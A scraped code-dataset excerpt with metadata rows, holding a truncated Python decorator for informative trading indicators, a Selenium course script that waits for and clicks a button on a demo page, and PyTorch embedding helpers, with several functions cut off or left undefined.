PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
return decorator
| 41.100775 | 100 | 0.656733 |
4c60db4ddf2f272ea38921358d511b5e55303545
| 835 |
py
|
Python
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 234 |
2020-04-03T02:59:30.000Z
|
2022-03-27T15:29:21.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 8 |
2020-04-20T11:20:43.000Z
|
2021-08-18T16:41:15.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 77 |
2020-04-03T13:25:19.000Z
|
2022-02-24T15:31:26.000Z
|
from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
'A mensagem de sucesso no apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concludo'
| 21.973684 | 58 | 0.762874 |
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
| 1,470 |
py
|
Python
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 24 |
2020-06-30T11:43:38.000Z
|
2021-11-15T22:58:47.000Z
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | null | null | null |
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 4 |
2020-10-15T10:54:18.000Z
|
2021-05-25T07:38:14.000Z
|
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| 24.098361 | 86 | 0.586395 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.